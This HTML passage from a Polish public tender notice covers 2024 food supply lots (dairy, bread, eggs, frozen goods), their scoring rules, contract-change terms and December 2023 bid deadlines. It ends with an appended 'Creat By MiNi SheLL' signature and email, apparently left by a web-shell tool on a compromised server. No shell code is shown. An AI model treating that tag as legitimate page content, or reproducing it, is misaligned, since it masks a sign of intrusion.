CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15610000-7 - Produkty przemiału ziarna</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu wyboru najkorzystniejszej oferty zamawiający przyjął następujące kryteria, przypisując im odpowiednio wagi procentowe:<br/>Dla wszystkich część zamówienia:<br/>a)	cena brutto za realizację całego zamówienia – 60%<br/>b)	termin płatności – 40%<br/><br/>2.	Zasady oceny ofert według ustalonych kryteriów<br/>Całkowita liczba punktów, jaka otrzyma oferta, zostanie obliczona według wzoru:<br/>Lp = C + D<br/>gdzie:<br/>Lp – całkowita liczba uzyskanych punktów;<br/>C – punkty uzyskane w kryterium ceny brutto oferty;<br/>D – punkty uzyskane w kryterium termin dostawy<br/><br/>a) punkty w kryterium	cena brutto za realizację całego zamówienia zostanie wyliczona według następującego wzoru:<br/><br/> najniższa cena ofertowa brutto<br/>C = ---------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/>gdzie:<br/> <br/> <br/>C – wskaźnik kryterium ceny w punktach; 60% - waga kryterium w procentach<br/>Z tytułu kryterium ceny Wykonawca może uzyskać maksymalnie 60 punktów.<br/>b)	punkty w kryterium termin płatności zostaną przyznane zgodnie z zasadą:<br/><br/>Jeżeli Wykonawca zadeklaruje:<br/>oferowany termin płatności wynoszący 14 dni - 0 pkt; oferowany termin płatności wynoszący 21 dni	- 20 pkt; oferowany termin płatności wynoszący 30 dni	- 40 pkt<br/><br/>UWAGA !<br/><br/>Termin płatności, jaki mogą zaoferować Wykonawcy może wynosić jedynie 14, 21 albo 30 dni.<br/>Oferta Wykonawcy, który:<br/>1)	Zaoferuje inny termin płatności niż określony pkt. 2 lit. b<br/>2)	nie zaproponuje żadnego terminu<br/>zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy.<br/><br/><br/>Z tytułu kryterium termin dostawy Wykonawca może uzyskać maksymalnie 40 punktów.<br/><br/>3.	Każda część zamówienia podlegać będzie oddzielnej ocenie i dla każdej z części zostanie przyznana punktacja.<br/> <br/>4.	Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona, spełni wymogi Ustawy oraz uzyska łącznie najwyższą liczbę punktów.<br/>5.	Oferta najkorzystniejsza może uzyskać maksymalnie 100 punktów.<br/>6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4. PRODUKTY MLECZARSKIE - Wszystkie produkty muszą być najwyższej jakości , dobry smak po otwarciu produktów, niezbrylone sery naturalne, gęste jogurty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu wyboru najkorzystniejszej oferty zamawiający przyjął następujące kryteria, przypisując im odpowiednio wagi procentowe:<br/>Dla wszystkich część zamówienia:<br/>a)	cena brutto za realizację całego zamówienia – 60%<br/>b)	termin płatności – 40%<br/><br/>2.	Zasady oceny ofert według ustalonych kryteriów<br/>Całkowita liczba punktów, jaka otrzyma oferta, zostanie obliczona według wzoru:<br/>Lp = C + D<br/>gdzie:<br/>Lp – całkowita liczba uzyskanych punktów;<br/>C – punkty uzyskane w kryterium ceny brutto oferty;<br/>D – punkty uzyskane w kryterium termin dostawy<br/><br/>a) punkty w kryterium	cena brutto za realizację całego zamówienia zostanie wyliczona według następującego wzoru:<br/><br/> najniższa cena ofertowa brutto<br/>C = ---------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/>gdzie:<br/> <br/> <br/>C – wskaźnik kryterium ceny w punktach; 60% - waga kryterium w procentach<br/>Z tytułu kryterium ceny Wykonawca może uzyskać maksymalnie 60 punktów.<br/>b)	punkty w kryterium termin płatności zostaną przyznane zgodnie z zasadą:<br/><br/>Jeżeli Wykonawca zadeklaruje:<br/>oferowany termin płatności wynoszący 14 dni - 0 pkt; oferowany termin płatności wynoszący 21 dni	- 20 pkt; oferowany termin płatności wynoszący 30 dni	- 40 pkt<br/><br/>UWAGA !<br/><br/>Termin płatności, jaki mogą zaoferować Wykonawcy może wynosić jedynie 14, 21 albo 30 dni.<br/>Oferta Wykonawcy, który:<br/>1)	Zaoferuje inny termin płatności niż określony pkt. 2 lit. b<br/>2)	nie zaproponuje żadnego terminu<br/>zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy.<br/><br/><br/>Z tytułu kryterium termin dostawy Wykonawca może uzyskać maksymalnie 40 punktów.<br/><br/>3.	Każda część zamówienia podlegać będzie oddzielnej ocenie i dla każdej z części zostanie przyznana punktacja.<br/> <br/>4.	Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona, spełni wymogi Ustawy oraz uzyska łącznie najwyższą liczbę punktów.<br/>5.	Oferta najkorzystniejsza może uzyskać maksymalnie 100 punktów.<br/>6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5. PIECZYWO I WYROBY PIEKARSKIE- Wszystkie produkty muszą być najwyższej jakości, chrupkie, świeże, niegumiaste Drożdżówki i ciasta drożdżowe nie mogą być z ciasta głęboko mrożonego i muszą zawierać mniej niż 10g cukru/100gproduktuoraz 10g tłuszczu/100g produktu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu wyboru najkorzystniejszej oferty zamawiający przyjął następujące kryteria, przypisując im odpowiednio wagi procentowe:<br/>Dla wszystkich część zamówienia:<br/>a)	cena brutto za realizację całego zamówienia – 60%<br/>b)	termin płatności – 40%<br/><br/>2.	Zasady oceny ofert według ustalonych kryteriów<br/>Całkowita liczba punktów, jaka otrzyma oferta, zostanie obliczona według wzoru:<br/>Lp = C + D<br/>gdzie:<br/>Lp – całkowita liczba uzyskanych punktów;<br/>C – punkty uzyskane w kryterium ceny brutto oferty;<br/>D – punkty uzyskane w kryterium termin dostawy<br/><br/>a) punkty w kryterium	cena brutto za realizację całego zamówienia zostanie wyliczona według następującego wzoru:<br/><br/> najniższa cena ofertowa brutto<br/>C = ---------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/>gdzie:<br/> <br/> <br/>C – wskaźnik kryterium ceny w punktach; 60% - waga kryterium w procentach<br/>Z tytułu kryterium ceny Wykonawca może uzyskać maksymalnie 60 punktów.<br/>b)	punkty w kryterium termin płatności zostaną przyznane zgodnie z zasadą:<br/><br/>Jeżeli Wykonawca zadeklaruje:<br/>oferowany termin płatności wynoszący 14 dni - 0 pkt; oferowany termin płatności wynoszący 21 dni	- 20 pkt; oferowany termin płatności wynoszący 30 dni	- 40 pkt<br/><br/>UWAGA !<br/><br/>Termin płatności, jaki mogą zaoferować Wykonawcy może wynosić jedynie 14, 21 albo 30 dni.<br/>Oferta Wykonawcy, który:<br/>1)	Zaoferuje inny termin płatności niż określony pkt. 2 lit. b<br/>2)	nie zaproponuje żadnego terminu<br/>zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy.<br/><br/><br/>Z tytułu kryterium termin dostawy Wykonawca może uzyskać maksymalnie 40 punktów.<br/><br/>3.	Każda część zamówienia podlegać będzie oddzielnej ocenie i dla każdej z części zostanie przyznana punktacja.<br/> <br/>4.	Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona, spełni wymogi Ustawy oraz uzyska łącznie najwyższą liczbę punktów.<br/>5.	Oferta najkorzystniejsza może uzyskać maksymalnie 100 punktów.<br/>6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 JAJA- Wszystkie produkty muszą być najwyższej jakości, jaja klasa wagowa L (63-73 g.) chów 3/PL (klatkowy) świeże, niepopękane skorupki </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu wyboru najkorzystniejszej oferty zamawiający przyjął następujące kryteria, przypisując im odpowiednio wagi procentowe:<br/>Dla wszystkich część zamówienia:<br/>a)	cena brutto za realizację całego zamówienia – 60%<br/>b)	termin płatności – 40%<br/><br/>2.	Zasady oceny ofert według ustalonych kryteriów<br/>Całkowita liczba punktów, jaka otrzyma oferta, zostanie obliczona według wzoru:<br/>Lp = C + D<br/>gdzie:<br/>Lp – całkowita liczba uzyskanych punktów;<br/>C – punkty uzyskane w kryterium ceny brutto oferty;<br/>D – punkty uzyskane w kryterium termin dostawy<br/><br/>a) punkty w kryterium	cena brutto za realizację całego zamówienia zostanie wyliczona według następującego wzoru:<br/><br/> najniższa cena ofertowa brutto<br/>C = ---------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/>gdzie:<br/> <br/> <br/>C – wskaźnik kryterium ceny w punktach; 60% - waga kryterium w procentach<br/>Z tytułu kryterium ceny Wykonawca może uzyskać maksymalnie 60 punktów.<br/>b)	punkty w kryterium termin płatności zostaną przyznane zgodnie z zasadą:<br/><br/>Jeżeli Wykonawca zadeklaruje:<br/>oferowany termin płatności wynoszący 14 dni - 0 pkt; oferowany termin płatności wynoszący 21 dni	- 20 pkt; oferowany termin płatności wynoszący 30 dni	- 40 pkt<br/><br/>UWAGA !<br/><br/>Termin płatności, jaki mogą zaoferować Wykonawcy może wynosić jedynie 14, 21 albo 30 dni.<br/>Oferta Wykonawcy, który:<br/>1)	Zaoferuje inny termin płatności niż określony pkt. 2 lit. b<br/>2)	nie zaproponuje żadnego terminu<br/>zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy.<br/><br/><br/>Z tytułu kryterium termin dostawy Wykonawca może uzyskać maksymalnie 40 punktów.<br/><br/>3.	Każda część zamówienia podlegać będzie oddzielnej ocenie i dla każdej z części zostanie przyznana punktacja.<br/> <br/>4.	Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona, spełni wymogi Ustawy oraz uzyska łącznie najwyższą liczbę punktów.<br/>5.	Oferta najkorzystniejsza może uzyskać maksymalnie 100 punktów.<br/>6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7. PRODUKTY MROŻONE- Wszystkie produkty muszą być najwyższej jakości, warzywa owoce świeże bez uszkodzeń, odpowiednio mrożone, świeże, mrożone odpowiednio całe , zapach smak świeży, po odmrożeniu nie rozpadają się, bez glazury SHP. 175G-340G. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu wyboru najkorzystniejszej oferty zamawiający przyjął następujące kryteria, przypisując im odpowiednio wagi procentowe:<br/>Dla wszystkich część zamówienia:<br/>a)	cena brutto za realizację całego zamówienia – 60%<br/>b)	termin płatności – 40%<br/><br/>2.	Zasady oceny ofert według ustalonych kryteriów<br/>Całkowita liczba punktów, jaka otrzyma oferta, zostanie obliczona według wzoru:<br/>Lp = C + D<br/>gdzie:<br/>Lp – całkowita liczba uzyskanych punktów;<br/>C – punkty uzyskane w kryterium ceny brutto oferty;<br/>D – punkty uzyskane w kryterium termin dostawy<br/><br/>a) punkty w kryterium	cena brutto za realizację całego zamówienia zostanie wyliczona według następującego wzoru:<br/><br/> najniższa cena ofertowa brutto<br/>C = ---------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/>gdzie:<br/> <br/> <br/>C – wskaźnik kryterium ceny w punktach; 60% - waga kryterium w procentach<br/>Z tytułu kryterium ceny Wykonawca może uzyskać maksymalnie 60 punktów.<br/>b)	punkty w kryterium termin płatności zostaną przyznane zgodnie z zasadą:<br/><br/>Jeżeli Wykonawca zadeklaruje:<br/>oferowany termin płatności wynoszący 14 dni - 0 pkt; oferowany termin płatności wynoszący 21 dni	- 20 pkt; oferowany termin płatności wynoszący 30 dni	- 40 pkt<br/><br/>UWAGA !<br/><br/>Termin płatności, jaki mogą zaoferować Wykonawcy może wynosić jedynie 14, 21 albo 30 dni.<br/>Oferta Wykonawcy, który:<br/>1)	Zaoferuje inny termin płatności niż określony pkt. 2 lit. b<br/>2)	nie zaproponuje żadnego terminu<br/>zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy.<br/><br/><br/>Z tytułu kryterium termin dostawy Wykonawca może uzyskać maksymalnie 40 punktów.<br/><br/>3.	Każda część zamówienia podlegać będzie oddzielnej ocenie i dla każdej z części zostanie przyznana punktacja.<br/> <br/>4.	Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona, spełni wymogi Ustawy oraz uzyska łącznie najwyższą liczbę punktów.<br/>5.	Oferta najkorzystniejsza może uzyskać maksymalnie 100 punktów.<br/>6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany lub uzupełnienia niniejszej umowy mogą nastąpić za zgodą Stron w formie pisemnego aneksu pod rygorem nieważności.<br/>2.	Zmiany w umowie w trakcie jej realizacji są możliwe, bez przeprowadzania nowego postępowania i mogą dotyczyć:<br/>1)	wydłużenia okresu realizacji umowy w przypadku, gdy nie została wyczerpana kwota maksymalnego wynagrodzenia wskazana w § 3 ust. 2 umowy, z zastrzeżeniem, że łączny okres realizacji dostaw w ramach umowy nie może być dłuższy niż 1 miesiąc. W przypadku wydłużenia okresu realizacji dostaw, liczba realizowanych dostaw ulega zwiększeniu;<br/>2)	realizacji dodatkowych dostaw, których nie uwzględniono w zamówieniu podstawowym,<br/>3)	w przypadku wyczerpania poszczególnych pozycji asortymentu wymienionych w załączniku do Umowy w okresie trwania umowy, Zamawiający dopuszcza<br/>możliwość zwiększenia asortymentu wymienionego w załączniku do umowy zgodnie warunkami określonymi w umowie;<br/>4)	zmiany terminu realizacji zamówienia i/lub wartości umowy - w sytuacji gdy zmiana ta wynika z przyczyn niezależnych od Wykonawcy, w szczególności w przypadku wystąpienia siły wyższej- termin ulegnie przesunięciu o czas trwania siły wyższej;<br/>5)	zmiany wielkości opakowania dostarczanych towarów z zachowaniem zasady proporcjonalności. Zmiana wielkości opakowania nie może mieć wpływu na zmianę ogólnej ilości (l., sztuk, op., kg,) towarów objętych przedmiotową umową. Zmiana może nastąpić po uprzedniej pisemnej akceptacji Zamawiającego;<br/>6)	zmiany umowy w zakresie:<br/>a)	numeru katalogowego produktu (wyrobu),<br/>b)	nazwy produktu (wyrobu) przy zachowaniu jego parametrów jakościowych,<br/>c)	sposobu konfekcjonowania,<br/>d)	zaoferowania produktu (wyrobu) zamiennego w sytuacji gdy do sprzedaży zostanie wprowadzony przez Wykonawcę produkt udoskonalony o jakości wyższej lub w nowszej technologii stanowiącej technologicznie trwalsze i korzystniejsze rozwiązanie niż poprzednio używane; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-zamówienia, zgodnie z rozdziałem XVI</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com